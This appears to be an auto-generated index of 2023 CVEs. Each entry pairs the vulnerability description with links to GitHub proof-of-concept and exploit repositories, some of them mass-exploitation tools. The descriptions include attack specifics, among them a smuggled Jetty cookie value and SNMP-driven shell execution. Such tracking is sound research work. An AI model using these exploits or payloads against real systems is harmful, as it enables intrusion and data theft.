In Stimulsoft Designer (Desktop) 2023.1.5, and 2023.1.4, once an attacker decompiles the Stimulsoft.report.dll the attacker is able to decrypt any connectionstring stored in .mrt files since a static secret is used. The secret does not differ between the tested versions and different operating systems.
- [trustcves/CVE-2023-25263](https://github.com/trustcves/CVE-2023-25263)
### CVE-2023-25292 (2023-04-27)
Reflected Cross Site Scripting (XSS) in Intermesh BV Group-Office version 6.6.145, allows attackers to gain escalated privileges and gain sensitive information via the GO_LANGUAGE cookie.
- [brainkok/CVE-2023-25292](https://github.com/brainkok/CVE-2023-25292)
- [tucommenceapousser/CVE-2023-25292](https://github.com/tucommenceapousser/CVE-2023-25292)
### CVE-2023-25355 (2023-04-04)
CoreDial sipXcom up to and including 21.04 is vulnerable to Insecure Permissions. A user who has the ability to run commands as the `daemon` user on a sipXcom server can overwrite a service file, and escalate their privileges to `root`.
- [glefait/CVE-2023-25355-25356](https://github.com/glefait/CVE-2023-25355-25356)
### CVE-2023-25581
- [p33d/CVE-2023-25581](https://github.com/p33d/CVE-2023-25581)
### CVE-2023-25610
- [qi4L/CVE-2023-25610](https://github.com/qi4L/CVE-2023-25610)
### CVE-2023-25690 (2023-03-07)
Some mod_proxy configurations on Apache HTTP Server versions 2.4.0 through 2.4.55 allow a HTTP Request Smuggling attack.\n\n\n\n\nConfigurations are affected when mod_proxy is enabled along with some form of RewriteRule\n or ProxyPassMatch in which a non-specific pattern matches\n some portion of the user-supplied request-target (URL) data and is then\n re-inserted into the proxied request-target using variable \nsubstitution. For example, something like:\n\n\n\n\nRewriteEngine on\nRewriteRule "^/here/(.*)" "http://example.com:8080/elsewhere?$1"; [P]\nProxyPassReverse /here/ http://example.com:8080/\n\n\nRequest splitting/smuggling could result in bypass of access controls in the proxy server, proxying unintended URLs to existing origin servers, and cache poisoning. Users are recommended to update to at least version 2.4.56 of Apache HTTP Server.\n\n\n
- [tbachvarova/linux-apache-fix-mod_rewrite-spaceInURL](https://github.com/tbachvarova/linux-apache-fix-mod_rewrite-spaceInURL)
- [dhmosfunk/CVE-2023-25690-POC](https://github.com/dhmosfunk/CVE-2023-25690-POC)
- [thanhlam-attt/CVE-2023-25690](https://github.com/thanhlam-attt/CVE-2023-25690)
### CVE-2023-25725 (2023-02-14)
HAProxy before 2.7.3 may allow a bypass of access control because HTTP/1 headers are inadvertently lost in some situations, aka "request smuggling." The HTTP header parsers in HAProxy may accept empty header field names, which could be used to truncate the list of HTTP headers and thus make some headers disappear after being parsed and processed for HTTP/1.0 and HTTP/1.1. For HTTP/2 and HTTP/3, the impact is limited because the headers disappear before being parsed and processed, as if they had not been sent by the client. The fixed versions are 2.7.3, 2.6.9, 2.5.12, 2.4.22, 2.2.29, and 2.0.31.
- [sgwgsw/LAB-CVE-2023-25725](https://github.com/sgwgsw/LAB-CVE-2023-25725)
### CVE-2023-25813 (2023-02-22)
Sequelize is a Node.js ORM tool. In versions prior to 6.19.1 a SQL injection exploit exists related to replacements. Parameters which are passed through replacements are not properly escaped which can lead to arbitrary SQL injection depending on the specific queries in use. The issue has been fixed in Sequelize 6.19.1. Users are advised to upgrade. Users unable to upgrade should not use the `replacements` and the `where` option in the same query.
- [bde574786/Sequelize-1day-CVE-2023-25813](https://github.com/bde574786/Sequelize-1day-CVE-2023-25813)
- [White-BAO/CVE-2023-25813](https://github.com/White-BAO/CVE-2023-25813)
### CVE-2023-25950 (2023-04-11)
HTTP request/response smuggling vulnerability in HAProxy version 2.7.0, and 2.6.1 to 2.6.7 allows a remote attacker to alter a legitimate user's request. As a result, the attacker may obtain sensitive information or cause a denial-of-service (DoS) condition.
- [dhmosfunk/HTTP3ONSTEROIDS](https://github.com/dhmosfunk/HTTP3ONSTEROIDS)
### CVE-2023-26035 (2023-02-25)
ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 are vulnerable to Unauthenticated Remote Code Execution via Missing Authorization. There are no permissions check on the snapshot action, which expects an id to fetch an existing monitor but can be passed an object to create a new one instead. TriggerOn ends up calling shell_exec using the supplied Id. This issue is fixed in This issue is fixed in versions 1.36.33 and 1.37.33.
- [rvizx/CVE-2023-26035](https://github.com/rvizx/CVE-2023-26035)
- [m3m0o/zoneminder-snapshots-rce-poc](https://github.com/m3m0o/zoneminder-snapshots-rce-poc)
- [heapbytes/CVE-2023-26035](https://github.com/heapbytes/CVE-2023-26035)
- [Yuma-Tsushima07/CVE-2023-26035](https://github.com/Yuma-Tsushima07/CVE-2023-26035)
- [0xfalafel/zoneminder_CVE-2023-26035](https://github.com/0xfalafel/zoneminder_CVE-2023-26035)
### CVE-2023-26048 (2023-04-18)
Jetty is a java based web server and servlet engine. In affected versions servlets with multipart support (e.g. annotated with `@MultipartConfig`) that call `HttpServletRequest.getParameter()` or `HttpServletRequest.getParts()` may cause `OutOfMemoryError` when the client sends a multipart request with a part that has a name but no filename and very large content. This happens even with the default settings of `fileSizeThreshold=0` which should stream the whole part content to disk. An attacker client may send a large multipart request and cause the server to throw `OutOfMemoryError`. However, the server may be able to recover after the `OutOfMemoryError` and continue its service -- although it may take some time. This issue has been patched in versions 9.4.51, 10.0.14, and 11.0.14. Users are advised to upgrade. Users unable to upgrade may set the multipart parameter `maxRequestSize` which must be set to a non-negative value, so the whole multipart content is limited (although still read into memory).
- [Trinadh465/jetty_9.4.31_CVE-2023-26048](https://github.com/Trinadh465/jetty_9.4.31_CVE-2023-26048)
- [hshivhare67/Jetty-v9.4.31_CVE-2023-26048](https://github.com/hshivhare67/Jetty-v9.4.31_CVE-2023-26048)
### CVE-2023-26049 (2023-04-18)
Jetty is a java based web server and servlet engine. Nonstandard cookie parsing in Jetty may allow an attacker to smuggle cookies within other cookies, or otherwise perform unintended behavior by tampering with the cookie parsing mechanism. If Jetty sees a cookie VALUE that starts with `"` (double quote), it will continue to read the cookie string until it sees a closing quote -- even if a semicolon is encountered. So, a cookie header such as: `DISPLAY_LANGUAGE="b; JSESSIONID=1337; c=d"` will be parsed as one cookie, with the name DISPLAY_LANGUAGE and a value of b; JSESSIONID=1337; c=d instead of 3 separate cookies. This has security implications because if, say, JSESSIONID is an HttpOnly cookie, and the DISPLAY_LANGUAGE cookie value is rendered on the page, an attacker can smuggle the JSESSIONID cookie into the DISPLAY_LANGUAGE cookie and thereby exfiltrate it. This is significant when an intermediary is enacting some policy based on cookies, so a smuggled cookie can bypass that policy yet still be seen by the Jetty server or its logging system. This issue has been addressed in versions 9.4.51, 10.0.14, 11.0.14, and 12.0.0.beta0 and users are advised to upgrade. There are no known workarounds for this issue.
- [hshivhare67/Jetty_v9.4.31_CVE-2023-26049](https://github.com/hshivhare67/Jetty_v9.4.31_CVE-2023-26049)
### CVE-2023-26067 (2023-04-10)
Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4).
- [horizon3ai/CVE-2023-26067](https://github.com/horizon3ai/CVE-2023-26067)
### CVE-2023-26136 (2023-07-01)
Versions of the package tough-cookie before 4.1.3 are vulnerable to Prototype Pollution due to improper handling of Cookies when using CookieJar in rejectPublicSuffixes=false mode. This issue arises from the manner in which the objects are initialized.
- [CUCUMBERanOrSNCompany/SealSecurityAssignment](https://github.com/CUCUMBERanOrSNCompany/SealSecurityAssignment)
- [ronmadar/Open-Source-Seal-Security](https://github.com/ronmadar/Open-Source-Seal-Security)
- [m-lito13/SealSecurity_Exam](https://github.com/m-lito13/SealSecurity_Exam)
### CVE-2023-26144 (2023-09-20)
Versions of the package graphql from 16.3.0 and before 16.8.1 are vulnerable to Denial of Service (DoS) due to insufficient checks in the OverlappingFieldsCanBeMergedRule.ts file when parsing large queries. This vulnerability allows an attacker to degrade system performance.\r\r**Note:** It was not proven that this vulnerability can crash the process.
- [tadhglewis/apollo-koa-minimal](https://github.com/tadhglewis/apollo-koa-minimal)
### CVE-2023-26255 (2023-02-28)
An unauthenticated path traversal vulnerability affects the "STAGIL Navigation for Jira - Menu & Themes" plugin before 2.0.52 for Jira. By modifying the fileName parameter to the snjCustomDesignConfig endpoint, it is possible to traverse and read the file system.
- [tucommenceapousser/CVE-2023-26255-Exp](https://github.com/tucommenceapousser/CVE-2023-26255-Exp)
- [Nian-Stars/CVE-2023-26255-6](https://github.com/Nian-Stars/CVE-2023-26255-6)
### CVE-2023-26256 (2023-02-28)
An unauthenticated path traversal vulnerability affects the "STAGIL Navigation for Jira - Menu & Themes" plugin before 2.0.52 for Jira. By modifying the fileName parameter to the snjFooterNavigationConfig endpoint, it is possible to traverse and read the file system.
- [0x7eTeam/CVE-2023-26256](https://github.com/0x7eTeam/CVE-2023-26256)
- [xhs-d/CVE-2023-26256](https://github.com/xhs-d/CVE-2023-26256)
- [qs119/CVE-2023-26256](https://github.com/qs119/CVE-2023-26256)
- [jcad123/CVE-2023-26256](https://github.com/jcad123/CVE-2023-26256)
### CVE-2023-26258 (2023-07-03)
Arcserve UDP through 9.0.6034 allows authentication bypass. The method getVersionInfo at WebServiceImpl/services/FlashServiceImpl leaks the AuthUUID token. This token can be used at /WebServiceImpl/services/VirtualStandbyServiceImpl to obtain a valid session. This session can be used to execute any task as administrator.
- [mdsecactivebreach/CVE-2023-26258-ArcServe](https://github.com/mdsecactivebreach/CVE-2023-26258-ArcServe)
### CVE-2023-26262 (2023-03-14)
An issue was discovered in Sitecore XP/XM 10.3. As an authenticated Sitecore user, a unrestricted language file upload vulnerability exists the can lead to direct code execution on the content management (CM) server.
- [istern/CVE-2023-26262](https://github.com/istern/CVE-2023-26262)
### CVE-2023-26269 (2023-04-03)
Apache James server version 3.7.3 and earlier provides a JMX management service without authentication by default. This allows privilege escalation by a \nmalicious local user.\n\nAdministrators are advised to disable JMX, or set up a JMX password.\n\nNote that version 3.7.4 onward will set up a JMX password automatically for Guice users.\n\n\n
- [mbadanoiu/CVE-2023-26269](https://github.com/mbadanoiu/CVE-2023-26269)
### CVE-2023-26360 (2023-03-23)
Adobe ColdFusion versions 2018 Update 15 (and earlier) and 2021 Update 5 (and earlier) are affected by an Improper Access Control vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction.
- [yosef0x01/CVE-2023-26360](https://github.com/yosef0x01/CVE-2023-26360)
- [jakabakos/CVE-2023-26360-adobe-coldfusion-rce-exploit](https://github.com/jakabakos/CVE-2023-26360-adobe-coldfusion-rce-exploit)
- [CuriousLearnerDev/ColdFusion_EXp](https://github.com/CuriousLearnerDev/ColdFusion_EXp)
### CVE-2023-26469 (2023-08-17)
In Jorani 1.0.0, an attacker could leverage path traversal to access files and execute code on the server.
- [d0rb/CVE-2023-26469](https://github.com/d0rb/CVE-2023-26469)
### CVE-2023-26563 (2023-07-12)
The Syncfusion EJ2 Node File Provider 0102271 is vulnerable to filesystem-server.js directory traversal. As a result, an unauthenticated attacker can: - On Windows, list files in any directory, read any file, delete any file, upload any file to any directory accessible by the web server. - On Linux, read any file, download any directory, delete any file, upload any file to any directory accessible by the web server.
- [RupturaInfoSec/CVE-2023-26563-26564-26565](https://github.com/RupturaInfoSec/CVE-2023-26563-26564-26565)
### CVE-2023-26602 (2023-02-26)
ASUS ASMB8 iKVM firmware through 1.14.51 allows remote attackers to execute arbitrary code by using SNMP to create extensions, as demonstrated by snmpset for NET-SNMP-EXTEND-MIB with /bin/sh for command execution.
- [D1G17/CVE-2023-26602](https://github.com/D1G17/CVE-2023-26602)
### CVE-2023-26607 (2023-02-26)
In the Linux kernel 6.0.8, there is an out-of-bounds read in ntfs_attr_find in fs/ntfs/attrib.c.
- [Trinadh465/linux-4.1.15_CVE-2023-26607](https://github.com/Trinadh465/linux-4.1.15_CVE-2023-26607)
### CVE-2023-26609 (2023-02-27)
ABUS TVIP 20000-21150 devices allows remote attackers to execute arbitrary code via shell metacharacters in the /cgi-bin/mft/wireless_mft ap field.
- [D1G17/CVE-2023-26609](https://github.com/D1G17/CVE-2023-26609)
### CVE-2023-26692 (2023-03-30)
ZCBS Zijper Collectie Beheer Systeem (ZCBS), Zijper Publication Management System (ZPBS), and Zijper Image Bank Management System (ZBBS) 4.14k is vulnerable to Cross Site Scripting (XSS).
- [bigzooooz/CVE-2023-26692](https://github.com/bigzooooz/CVE-2023-26692)
### CVE-2023-26785
- [Ant1sec-ops/CVE-2023-26785](https://github.com/Ant1sec-ops/CVE-2023-26785)
### CVE-2023-26818 (2023-05-19)
Telegram 9.3.1 and 9.4.0 allows attackers to access restricted files, microphone ,or video recording via the DYLD_INSERT_LIBRARIES flag.
- [Zeyad-Azima/CVE-2023-26818](https://github.com/Zeyad-Azima/CVE-2023-26818)
### CVE-2023-26852 (2023-04-12)
An arbitrary file upload vulnerability in the upload plugin of Textpattern v4.8.8 and below allows attackers to execute arbitrary code by uploading a crafted PHP file.
- [leekenghwa/CVE-2023-26852-Textpattern-v4.8.8-and-](https://github.com/leekenghwa/CVE-2023-26852-Textpattern-v4.8.8-and-)
### CVE-2023-26866 (2023-04-04)
GreenPacket OH736's WR-1200 Indoor Unit, OT-235 with firmware versions M-IDU-1.6.0.3_V1.1 and MH-46360-2.0.3-R5-GP respectively are vulnerable to remote command injection. Commands are executed using pre-login execution and executed with root privileges allowing complete takeover.
- [lionelmusonza/CVE-2023-26866](https://github.com/lionelmusonza/CVE-2023-26866)
### CVE-2023-26976 (2023-04-04)
Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the ssid parameter in the form_fast_setting_wifi_set function.
- [FzBacon/CVE-2023-26976_tenda_AC6_stack_overflow](https://github.com/FzBacon/CVE-2023-26976_tenda_AC6_stack_overflow)
### CVE-2023-26982 (2023-03-29)
Trudesk v1.2.6 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Add Tags parameter under the Create Ticket function.
- [bypazs/CVE-2023-26982](https://github.com/bypazs/CVE-2023-26982)
- [bypazs/Duplicate-of-CVE-2023-26982](https://github.com/bypazs/Duplicate-of-CVE-2023-26982)
### CVE-2023-26984 (2023-03-29)
An issue in the password reset function of Peppermint v0.2.4 allows attackers to access the emails and passwords of the Tickets page via a crafted request.
- [bypazs/CVE-2023-26984](https://github.com/bypazs/CVE-2023-26984)
### CVE-2023-27035 (2023-05-01)
An issue discovered in Obsidian Canvas 1.1.9 allows remote attackers to send desktop notifications, record user audio and other unspecified impacts via embedded website on the canvas page.
- [fivex3/CVE-2023-27035](https://github.com/fivex3/CVE-2023-27035)
### CVE-2023-27100 (2023-03-22)
Improper restriction of excessive authentication attempts in the SSHGuard component of Netgate pfSense Plus software v22.05.1 and pfSense CE software v2.6.0 allows attackers to bypass brute force protection mechanisms via crafted web requests.
- [DarokNET/CVE-2023-27100](https://github.com/DarokNET/CVE-2023-27100)
- [fabdotnet/CVE-2023-27100](https://github.com/fabdotnet/CVE-2023-27100)
### CVE-2023-27163 (2023-03-31)
request-baskets up to v1.2.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /api/baskets/{name}. This vulnerability allows attackers to access network resources and sensitive information via a crafted API request.
- [entr0pie/CVE-2023-27163](https://github.com/entr0pie/CVE-2023-27163)
- [seanrdev/cve-2023-27163](https://github.com/seanrdev/cve-2023-27163)
- [overgrowncarrot1/CVE-2023-27163](https://github.com/overgrowncarrot1/CVE-2023-27163)
- [ThickCoco/CVE-2023-27163-POC](https://github.com/ThickCoco/CVE-2023-27163-POC)
- [davuXVI/CVE-2023-27163](https://github.com/davuXVI/CVE-2023-27163)
- [HusenjanDev/CVE-2023-27163-AND-Mailtrail-v0.53](https://github.com/HusenjanDev/CVE-2023-27163-AND-Mailtrail-v0.53)
- [rvizx/CVE-2023-27163](https://github.com/rvizx/CVE-2023-27163)
- [thomas-osgood/CVE-2023-27163](https://github.com/thomas-osgood/CVE-2023-27163)
- [cowsecurity/CVE-2023-27163](https://github.com/cowsecurity/CVE-2023-27163)
- [samh4cks/CVE-2023-27163-InternalProber](https://github.com/samh4cks/CVE-2023-27163-InternalProber)
- [Hamibubu/CVE-2023-27163](https://github.com/Hamibubu/CVE-2023-27163)
- [KharimMchatta/basketcraft](https://github.com/KharimMchatta/basketcraft)
- [MasterCode112/CVE-2023-27163](https://github.com/MasterCode112/CVE-2023-27163)
- [Rubioo02/CVE-2023-27163](https://github.com/Rubioo02/CVE-2023-27163)
- [madhavmehndiratta/CVE-2023-27163](https://github.com/madhavmehndiratta/CVE-2023-27163)
- [Rishabh-Kumar-Cyber-Sec/CVE-2023-27163-ssrf-to-port-scanning](https://github.com/Rishabh-Kumar-Cyber-Sec/CVE-2023-27163-ssrf-to-port-scanning)
- [btar1gan/exploit_CVE-2023-27163](https://github.com/btar1gan/exploit_CVE-2023-27163)
### CVE-2023-27216 (2023-04-12)
An issue found in D-Link DSL-3782 v.1.03 allows remote authenticated users to execute arbitrary code as root via the network settings page.
- [FzBacon/CVE-2023-27216_D-Link_DSL-3782_Router_command_injection](https://github.com/FzBacon/CVE-2023-27216_D-Link_DSL-3782_Router_command_injection)
- [HoangREALER/CVE-2023-27216](https://github.com/HoangREALER/CVE-2023-27216)
### CVE-2023-27326 (2024-05-03)
Parallels Desktop Toolgate Directory Traversal Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop. An attacker must first obtain the ability to execute high-privileged code on the target guest system in order to exploit this vulnerability.\n\nThe specific flaw exists within the Toolgate component. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the current user on the host system. Was ZDI-CAN-18933.
- [Impalabs/CVE-2023-27326](https://github.com/Impalabs/CVE-2023-27326)
- [Malwareman007/CVE-2023-27326](https://github.com/Malwareman007/CVE-2023-27326)
### CVE-2023-27327 (2024-05-03)
Parallels Desktop Toolgate Time-Of-Check Time-Of-Use Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Parallels Desktop. An attacker must first obtain the ability to execute high-privileged code on the target guest system in order to exploit this vulnerability.\n\nThe specific flaw exists within the Toolgate component. The issue results from the lack of proper locking when performing operations on an object. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of the current user on the host system. Was ZDI-CAN-18964.
- [kn32/parallels-plist-escape](https://github.com/kn32/parallels-plist-escape)
### CVE-2023-27350 (2023-04-20)
This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The specific flaw exists within the SetupCompleted class. The issue results from improper access control. An attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-18987.
- [MaanVader/CVE-2023-27350-POC](https://github.com/MaanVader/CVE-2023-27350-POC)
- [imancybersecurity/CVE-2023-27350-POC](https://github.com/imancybersecurity/CVE-2023-27350-POC)
- [horizon3ai/CVE-2023-27350](https://github.com/horizon3ai/CVE-2023-27350)
- [adhikara13/CVE-2023-27350](https://github.com/adhikara13/CVE-2023-27350)
- [ThatNotEasy/CVE-2023-27350](https://github.com/ThatNotEasy/CVE-2023-27350)
- [Jenderal92/CVE-2023-27350](https://github.com/Jenderal92/CVE-2023-27350)
- [ASG-CASTLE/CVE-2023-27350](https://github.com/ASG-CASTLE/CVE-2023-27350)
- [rasan2001/CVE-2023-27350-Ongoing-Exploitation-of-PaperCut-Remote-Code-Execution-Vulnerability](https://github.com/rasan2001/CVE-2023-27350-Ongoing-Exploitation-of-PaperCut-Remote-Code-Execution-Vulnerability)
### CVE-2023-27363 (2024-05-03)
Foxit PDF Reader exportXFAData Exposed Dangerous Method Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the exportXFAData method. The application exposes a JavaScript interface that allows writing arbitrary files. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-19697.
- [qwqdanchun/CVE-2023-27363](https://github.com/qwqdanchun/CVE-2023-27363)
- [webraybtl/CVE-2023-27363](https://github.com/webraybtl/CVE-2023-27363)
- [CN016/-Foxit-PDF-CVE-2023-27363-](https://github.com/CN016/-Foxit-PDF-CVE-2023-27363-)
### CVE-2023-27372 (2023-02-28)
SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.
- [nuts7/CVE-2023-27372](https://github.com/nuts7/CVE-2023-27372)
- [Chocapikk/CVE-2023-27372](https://github.com/Chocapikk/CVE-2023-27372)
- [dream434/CVE-2023-27372](https://github.com/dream434/CVE-2023-27372)
- [0SPwn/CVE-2023-27372-PoC](https://github.com/0SPwn/CVE-2023-27372-PoC)
- [izzz0/CVE-2023-27372-POC](https://github.com/izzz0/CVE-2023-27372-POC)
- [ThatNotEasy/CVE-2023-27372](https://github.com/ThatNotEasy/CVE-2023-27372)
- [redboltsec/CVE-2023-27372-PoC](https://github.com/redboltsec/CVE-2023-27372-PoC)
- [1amthebest1/CVE-2023-27372](https://github.com/1amthebest1/CVE-2023-27372)
### CVE-2023-27470 (2023-09-11)
BASupSrvcUpdater.exe in N-able Take Control Agent through 7.0.41.1141 before 7.0.43 has a TOCTOU Race Condition via a pseudo-symlink at %PROGRAMDATA%\GetSupportService_N-Central\PushUpdates, leading to arbitrary file deletion.
- [3lp4tr0n/CVE-2023-27470_Exercise](https://github.com/3lp4tr0n/CVE-2023-27470_Exercise)
### CVE-2023-27524 (2023-04-24)
Session Validation attacks in Apache Superset versions up to and including 2.0.1. Installations that have not altered the default configured SECRET_KEY according to installation instructions allow for an attacker to authenticate and access unauthorized resources. This does not affect Superset administrators who have changed the default value for SECRET_KEY config.\n\nAll superset installations should always set a unique secure random SECRET_KEY. Your SECRET_KEY is used to securely sign all session cookies and encrypting sensitive information on the database.\nAdd a strong SECRET_KEY to your `superset_config.py` file like:\n\nSECRET_KEY = <YOUR_OWN_RANDOM_GENERATED_SECRET_KEY>\n\nAlternatively you can set it with `SUPERSET_SECRET_KEY` environment variable.\n
- [horizon3ai/CVE-2023-27524](https://github.com/horizon3ai/CVE-2023-27524)
- [Okaytc/Superset_auth_bypass_check](https://github.com/Okaytc/Superset_auth_bypass_check)
- [ZZ-SOCMAP/CVE-2023-27524](https://github.com/ZZ-SOCMAP/CVE-2023-27524)
- [MaanVader/CVE-2023-27524-POC](https://github.com/MaanVader/CVE-2023-27524-POC)
- [ThatNotEasy/CVE-2023-27524](https://github.com/ThatNotEasy/CVE-2023-27524)
- [TardC/CVE-2023-27524](https://github.com/TardC/CVE-2023-27524)
- [necroteddy/CVE-2023-27524](https://github.com/necroteddy/CVE-2023-27524)
- [jakabakos/CVE-2023-27524-Apache-Superset-Auth-Bypass-and-RCE](https://github.com/jakabakos/CVE-2023-27524-Apache-Superset-Auth-Bypass-and-RCE)
- [CN016/Apache-Superset-SECRET_KEY-CVE-2023-27524-](https://github.com/CN016/Apache-Superset-SECRET_KEY-CVE-2023-27524-)
- [NguyenCongHaiNam/Research-CVE-2023-27524](https://github.com/NguyenCongHaiNam/Research-CVE-2023-27524)
- [karthi-the-hacker/CVE-2023-27524](https://github.com/karthi-the-hacker/CVE-2023-27524)
- [Cappricio-Securities/CVE-2023-27524](https://github.com/Cappricio-Securities/CVE-2023-27524)
### CVE-2023-27532 (2023-03-10)
Vulnerability in Veeam Backup & Replication component allows encrypted credentials stored in the configuration database to be obtained. This may lead to gaining access to the backup infrastructure hosts.
- [horizon3ai/CVE-2023-27532](https://github.com/horizon3ai/CVE-2023-27532)
- [sfewer-r7/CVE-2023-27532](https://github.com/sfewer-r7/CVE-2023-27532)
- [puckiestyle/CVE-2023-27532-RCE-Only](https://github.com/puckiestyle/CVE-2023-27532-RCE-Only)
### CVE-2023-27564 (2023-05-10)
The n8n package 0.218.0 for Node.js allows Information Disclosure.
- [david-botelho-mariano/exploit-CVE-2023-27564](https://github.com/david-botelho-mariano/exploit-CVE-2023-27564)
### CVE-2023-27566 (2023-03-03)
Cubism Core in Live2D Cubism Editor 4.2.03 allows out-of-bounds write via a crafted Section Offset Table or Count Info Table in an MOC3 file.
- [OpenL2D/moc3ingbird](https://github.com/OpenL2D/moc3ingbird)
### CVE-2023-27587 (2023-03-13)
ReadtoMyShoe, a web app that lets users upload articles and listen to them later, generates an error message containing sensitive information prior to commit 8533b01. If an error occurs when adding an article, the website shows the user an error message. If the error originates from the Google Cloud TTS request, then it will include the full URL of the request. The request URL contains the Google Cloud API key. This has been patched in commit 8533b01. Upgrading should be accompanied by deleting the current GCP API key and issuing a new one. There are no known workarounds.
- [vagnerd/CVE-2023-27587-PoC](https://github.com/vagnerd/CVE-2023-27587-PoC)
### CVE-2023-27703 (2023-04-12)
The Android version of pikpak v1.29.2 was discovered to contain an information leak via the debug interface.
- [happy0717/CVE-2023-27703](https://github.com/happy0717/CVE-2023-27703)
### CVE-2023-27704 (2023-04-12)
Void Tools Everything lower than v1.4.1.1022 was discovered to contain a Regular Expression Denial of Service (ReDoS).
- [happy0717/CVE-2023-27704](https://github.com/happy0717/CVE-2023-27704)
### CVE-2023-27742 (2023-05-16)
IDURAR ERP/CRM v1 was discovered to contain a SQL injection vulnerability via the component /api/login.
- [G37SYS73M/CVE-2023-27742](https://github.com/G37SYS73M/CVE-2023-27742)
### CVE-2023-27746 (2023-04-13)
BlackVue DR750-2CH LTE v.1.012_2022.10.26 was discovered to contain a weak default passphrase which can be easily cracked via a brute force attack if the WPA2 handshake is intercepted.
- [eyJhb/blackvue-cve-2023](https://github.com/eyJhb/blackvue-cve-2023)
### CVE-2023-27842 (2023-03-21)
Insecure Permissions vulnerability found in Extplorer File manager eXtplorer v.2.1.15 allows a remote attacker to execute arbitrary code via the index.php compenent
- [tristao-marinho/CVE-2023-27842](https://github.com/tristao-marinho/CVE-2023-27842)
- [cowsecurity/CVE-2023-27842](https://github.com/cowsecurity/CVE-2023-27842)
### CVE-2023-27997 (2023-06-13)
A heap-based buffer overflow vulnerability [CWE-122] in FortiOS version 7.2.4 and below, version 7.0.11 and below, version 6.4.12 and below, version 6.0.16 and below and FortiProxy version 7.2.3 and below, version 7.0.9 and below, version 2.0.12 and below, version 1.2 all versions, version 1.1 all versions SSL-VPN may allow a remote attacker to execute arbitrary code or commands via specifically crafted requests.
- [rio128128/CVE-2023-27997-POC](https://github.com/rio128128/CVE-2023-27997-POC)
- [BishopFox/CVE-2023-27997-check](https://github.com/BishopFox/CVE-2023-27997-check)
- [imbas007/CVE-2023-27997-Check](https://github.com/imbas007/CVE-2023-27997-Check)
- [puckiestyle/cve-2023-27997](https://github.com/puckiestyle/cve-2023-27997)
- [TechinsightsPro/ShodanFortiOS](https://github.com/TechinsightsPro/ShodanFortiOS)
- [Cyb3rEnthusiast/CVE-2023-27997](https://github.com/Cyb3rEnthusiast/CVE-2023-27997)
- [lexfo/xortigate-cve-2023-27997](https://github.com/lexfo/xortigate-cve-2023-27997)
- [delsploit/CVE-2023-27997](https://github.com/delsploit/CVE-2023-27997)
### CVE-2023-28121 (2023-04-12)
An issue in WooCommerce Payments plugin for WordPress (versions 5.6.1 and lower) allows an unauthenticated attacker to send requests on behalf of an elevated user, like administrator. This allows a remote, unauthenticated attacker to gain admin access on a site that has the affected version of the plugin activated.
- [gbrsh/CVE-2023-28121](https://github.com/gbrsh/CVE-2023-28121)
- [im-hanzou/Mass-CVE-2023-28121](https://github.com/im-hanzou/Mass-CVE-2023-28121)
- [rio128128/Mass-CVE-2023-28121-kdoec](https://github.com/rio128128/Mass-CVE-2023-28121-kdoec)
- [C04LA/CVE-2023-28121](https://github.com/C04LA/CVE-2023-28121)
- [Jenderal92/WP-CVE-2023-28121](https://github.com/Jenderal92/WP-CVE-2023-28121)
- [1337nemojj/CVE-2023-28121](https://github.com/1337nemojj/CVE-2023-28121)
### CVE-2023-28197 (2024-01-10)
An access issue was addressed with additional sandbox restrictions. This issue is fixed in macOS Ventura 13.3, macOS Big Sur 11.7.5, macOS Monterey 12.6.4. An app may be able to access user-sensitive data.
- [spotlightishere/inputcontrol](https://github.com/spotlightishere/inputcontrol)
### CVE-2023-28206 (2023-04-10)
An out-of-bounds write issue was addressed with improved input validation. This issue is fixed in macOS Monterey 12.6.5, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1, iOS 15.7.5 and iPadOS 15.7.5, macOS Big Sur 11.7.6. An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.
- [acceleratortroll/acceleratortroll](https://github.com/acceleratortroll/acceleratortroll)
### CVE-2023-28218 (2023-04-11)
Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability
- [h1bAna/CVE-2023-28218](https://github.com/h1bAna/CVE-2023-28218)
### CVE-2023-28229 (2023-04-11)
Windows CNG Key Isolation Service Elevation of Privilege Vulnerability
- [Y3A/CVE-2023-28229](https://github.com/Y3A/CVE-2023-28229)
- [byt3n33dl3/CrackKeyIso](https://github.com/byt3n33dl3/CrackKeyIso)
### CVE-2023-28231 (2023-04-11)
DHCP Server Service Remote Code Execution Vulnerability
- [TheHermione/CVE-2023-28231](https://github.com/TheHermione/CVE-2023-28231)
### CVE-2023-28244 (2023-04-11)
Windows Kerberos Elevation of Privilege Vulnerability
- [sk3w/cve-2023-28244](https://github.com/sk3w/cve-2023-28244)
### CVE-2023-28252 (2023-04-11)
Windows Common Log File System Driver Elevation of Privilege Vulnerability
- [fortra/CVE-2023-28252](https://github.com/fortra/CVE-2023-28252)
- [726232111/CVE-2023-28252](https://github.com/726232111/CVE-2023-28252)
- [Danasuley/CVE-2023-28252-](https://github.com/Danasuley/CVE-2023-28252-)
- [bkstephen/Compiled-PoC-Binary-For-CVE-2023-28252](https://github.com/bkstephen/Compiled-PoC-Binary-For-CVE-2023-28252)
